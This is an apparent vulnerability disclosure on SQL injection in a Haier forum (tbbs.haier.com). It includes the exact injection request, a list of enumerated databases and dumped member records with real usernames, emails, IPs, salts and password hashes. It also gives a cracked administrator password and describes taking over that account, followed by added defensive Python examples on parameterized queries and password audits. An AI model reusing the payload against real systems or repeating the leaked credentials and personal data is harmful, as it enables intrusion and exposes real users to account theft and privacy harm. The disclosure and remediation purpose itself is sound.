Haier forum SQL injection leaks 20k member records and allows modifying UC administrator info (with remediation)
2015-01-20 10:37:29         Source: sm0nk

SQL injection in a Discuz (DZ) forum. At least 20,000 records exposed: trs_ucenter_members_bak (8846 entries), trs_common_member (2727 entries) and uc_members (8326 entries).

0. The target site is tbbs.haier.com; this forum is not the same one as bbs.haier.com.

1. First, a minor issue: the crossdomain.xml file

http://tbbs.haier.com/crossdomain.xml

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>



2. A link that leaks an internal IP

http://tbbs.haier.com/HaierBBS/test.jsp

Internal IP: 10.135.103.22

Management platform:

http://tbbs.haier.com/was5/web/login.jsp



3. SQL injection vulnerability

Raise the level when injecting.

POST /HaierBBS/thrdapplycount/gettolcount.do HTTP/1.1
Content-Length: 46
Content-Type: application/x-www-form-urlencoded
Referer: http://tbbs.haier.com/
Cookie: JSESSIONID=C508D821EE8E5CC4B133E91E9FF5D81D.jvm1; idsALUserSource=""
Host: tbbs.haier.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

sourceId=1'%22&type=1%2C5%2C6%2C7%2C8%2C9%2C10
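The `sourceId` value above decodes to `1'"`, and the quote characters break the SQL statement the application builds from it. The example below is added here and is not the site's code (the server-side handler behind `gettolcount.do` is not on the page): it uses an in-memory SQLite table as a constructed stand-in to contrast string concatenation with a parameterized query. It also covers remediation item 1, since the comma-separated `type` list shows why validating and binding each value is more reliable than filtering characters.

```python
import sqlite3
from typing import Dict

# Values from the request above, URL-decoded.
PAYLOAD_SOURCE_ID = "1'\""
PAYLOAD_TYPES = "1,5,6,7,8,9,10"


def make_db() -> sqlite3.Connection:
    # Constructed stand-in for the application's table; the real schema is not on the page.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE thrd_apply (id INTEGER, source_id INTEGER, type INTEGER)")
    conn.executemany("INSERT INTO thrd_apply VALUES (?, ?, ?)",
                     [(1, 1, 1), (2, 1, 5), (3, 2, 5), (4, 1, 3)])
    return conn


def count_vulnerable(conn: sqlite3.Connection, source_id: str, types: str) -> int:
    # String concatenation: request parameters become part of the SQL text.
    sql = ("SELECT COUNT(*) FROM thrd_apply WHERE source_id = " + source_id
           + " AND type IN (" + types + ")")
    return conn.execute(sql).fetchone()[0]


def count_hardened(conn: sqlite3.Connection, source_id: str, types: str) -> int:
    # Validate the type first, then bind every value as a parameter. The comma list
    # is expanded into one placeholder per element, so no request data reaches the SQL text.
    sid = int(source_id)                      # raises ValueError on 1'"
    type_ids = [int(t) for t in types.split(",")]
    placeholders = ", ".join("?" for _ in type_ids)
    sql = "SELECT COUNT(*) FROM thrd_apply WHERE source_id = ? AND type IN (%s)" % placeholders
    return conn.execute(sql, [sid, *type_ids]).fetchone()[0]


def demo() -> Dict[str, object]:
    """Run both variants with a benign sourceId and with the page's payload."""
    conn = make_db()
    results: Dict[str, object] = {}
    results["vulnerable_benign"] = count_vulnerable(conn, "1", PAYLOAD_TYPES)
    try:
        results["vulnerable_payload"] = count_vulnerable(conn, PAYLOAD_SOURCE_ID, PAYLOAD_TYPES)
    except sqlite3.OperationalError as exc:
        # The quotes broke the statement: the database error that error-based injection keys on.
        results["vulnerable_payload"] = "sql error: " + str(exc)
    results["hardened_benign"] = count_hardened(conn, "1", PAYLOAD_TYPES)
    try:
        results["hardened_payload"] = count_hardened(conn, PAYLOAD_SOURCE_ID, PAYLOAD_TYPES)
    except ValueError:
        results["hardened_payload"] = "rejected: sourceId is not an integer"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

Both variants return the same count for benign input; only the concatenating one turns the payload into a database error, while the hardened one rejects it before any SQL is built. In the Java stack this site runs, the equivalent is a `PreparedStatement` with one `?` per bound value.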


(Screenshot: 1.jpg)



22 databases:

[*] confluence
[*] confluence2
[*] confluence3
[*] confluence4
[*] discuz0719
[*] discuz15
[*] gitlabhq_development
[*] gitlabhq_production
[*] gitlabhq_test
[*] information_schema
[*] logbak
[*] mysql
[*] performance_schema
[*] test
[*] trswcmcluster
[*] trswcmcluster0830
[*] trswcmclustercn
[*] trswcmv65clusterforcn0410
[*] trswcmv65clusterforen
[*] trswcmv65clusterforen1025
[*] trswcmv65clusterforen20131114
[*] trswcmv65plugins





Leaked member information, including username, password, salt, email, mobile number, etc.:

Table: trs_ucenter_members_bak
[8846 entries]

Table: trs_common_member
[2727 entries]

Table: uc_members
[8326 entries]

e.g.

back-end DBMS: MySQL 5.0
Database: discuz15
Table: uc_members
[8326 entries]
+------+---------+---------+--------+--------+-----------------+----------------------------------+----------+------------+--------------------------------------------------------+----------------------------------+-------------+---------------+
| uid  | myid    | myidkey | salt   | babao  | regip           | email                            | secques  | regdate    | username                                               | password                         | lastloginip | lastlogintime |
+------+---------+---------+--------+--------+-----------------+----------------------------------+----------+------------+--------------------------------------------------------+----------------------------------+-------------+---------------+
| 1    | <blank> | <blank> | 170560 | NULL   | 114.245.229.254 | admin@mocard.tv                  | <blank>  | 1259818150 | admin                                                  | e6dbb8e9474d11bd3697ba769a18f204 | 0           | 0             |
| 2    | <blank> | <blank> | 63b267 | NULL   | 114.245.229.254 | kllm868@163.com                  | <blank>  | 1259818742 | kllm868                                                | bd4c0638b9e9cea498aeae9684ce3112 | 0           | 0             |
| 8    | <blank> | <blank> | abff79 | NULL   | 114.245.231.251 | 2507248571111@qq.com             | <blank>  | 1259985674 | #aqa                                                   | 7beb4aed0685006f808f51ce537ec55a | 0           | 0             |
| 10   | <blank> | <blank> | 038643 | NULL   | 218.58.70.250   | wxn_summer520@163.com            | <blank>  | 1259992864 | \xe8??\xe9\xbb?                                        | a2adcc48ade4bf6c24e1510aa26f0ea3 | 0           | 0             |
| 15   | <blank> | <blank> | 3ac3b3 | NULL   | 210.5.133.19    | 94172070@qq.com                  | <blank>  | 1260006611 | s520                                                   | 5c68c562eaa0c48a54f0b587c1c8af7a | 0           | 0             |
| 16   | <blank> | <blank> | 8712f0 | NULL   | 114.245.231.251 | 4698642882w2w@qq.com             | <blank>  | 1260009400 | 2w2w2w                                                 | b5c32024ea7e703a4ac90536dbc381a7 | 0           | 0             |




(Screenshot: 2.jpg)





4. Arbitrary modification of UC administrator info

The administrator record from trs_ucenter_members_admin, obtained through the injection vulnerability:

+--------+---------+---------+--------+---------------+---------------------+--------+---------+------------+----------+----------------------------------+-------------+---------------+
| uid    | myid    | myidkey | salt   | regip         | email               | avatar | secques | regdate    | username | password                         | lastloginip | lastlogintime |
+--------+---------+---------+--------+---------------+---------------------+--------+---------+------------+----------+----------------------------------+-------------+---------------+
| 173356 | <blank> | <blank> | b351e0 | 10.135.103.22 | kiraqing@vip.qq.com | NULL   | <blank> | 1353657771 | lhtww    | 935af859a07284299ed775479542ff1f | 0           | 0             |
+--------+---------+---------+--------+---------------+---------------------+--------+---------+------------+----------+----------------------------------+-------------+---------------+



Although the password hash is salted, it still cracks to 123456.

After logging in, the account information can be changed at will: bind a mobile number, change the email address, and so on.

(Screenshot: 3.jpg, VIPuser)





5. Brute forcing

http://tuser.haier.com/ids/cn/haier_login.jsp?returnUrl=http://tuser.haier.com/HaierFramework/haier/appuser/vipUser/myhaier.jsp

If the UC administrator's password is 123456, other users' passwords may well be 123456 too; not tested.









 

Proof of vulnerability: screenshots 1.jpg, 2.jpg and 3.jpg (shown above).

 

Remediation:

1. Filter special characters.

2. Restrict access to the administrator interface.

3. Strengthen passwords (presumably needed).
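Section 4 notes that the salted administrator hash still fell to 123456, and remediation item 3 asks for stronger passwords. The example below is added here and is not the report's or the forum's code: it shows why a per-user salt does not protect a weak password, and implements the two defender-side controls that do help, a policy check at password-set time and an audit of existing rows against a blocklist. The hash layout `md5(md5(password) + salt)` is assumed here as the UCenter scheme; the salt, blocklist and passwords in the block are constructed, not taken from the page.

```python
import hashlib
import re
from typing import Optional


def uc_hash(password: str, salt: str) -> str:
    """UCenter-style stored hash: md5(md5(password) + salt), hex encoded.

    Assumed scheme for the uc_members table; the report itself does not state it.
    """
    inner = hashlib.md5(password.encode("utf-8")).hexdigest()
    return hashlib.md5((inner + salt).encode("utf-8")).hexdigest()


# Constructed blocklist; a deployment would load a large leaked-password list instead.
COMMON_PASSWORDS = ["123456", "password", "12345678", "qwerty", "111111", "haier123"]


def weak_reason(password: str) -> Optional[str]:
    """Policy check at registration or password change. None means the password passes."""
    if password.lower() in COMMON_PASSWORDS:
        return "on the common-password blocklist"
    if len(password) < 12:
        return "shorter than 12 characters"
    classes = sum(bool(re.search(p, password))
                  for p in (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]"))
    if classes < 3:
        return "uses fewer than three character classes"
    return None


def audit_stored_hash(salt: str, stored_hash: str) -> Optional[str]:
    """Audit an existing account: return the blocklisted password that reproduces the
    stored hash, or None.

    The per-user salt defeats precomputed tables, but two fast MD5 calls cost nothing,
    so anyone holding the row can test common passwords one at a time. That is why
    the salt on the page did not save the administrator account; only a password that
    is not guessable (and, longer term, a slow hash) does.
    """
    for candidate in COMMON_PASSWORDS:
        if uc_hash(candidate, salt) == stored_hash:
            return candidate
    return None


if __name__ == "__main__":
    salt = "a1b2c3"  # constructed salt
    for pw in ("123456", "abcdefghijkl", "Tbbs-Forum-2015!x"):
        print(pw, "->", weak_reason(pw) or "accepted",
              "| audit:", audit_stored_hash(salt, uc_hash(pw, salt)))
```

The audit flags the 123456 account immediately despite its salt, while the long mixed-class password passes the policy and is not found by the audit. Running `audit_stored_hash` over all rows after an incident like this one identifies which accounts need a forced reset.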

 
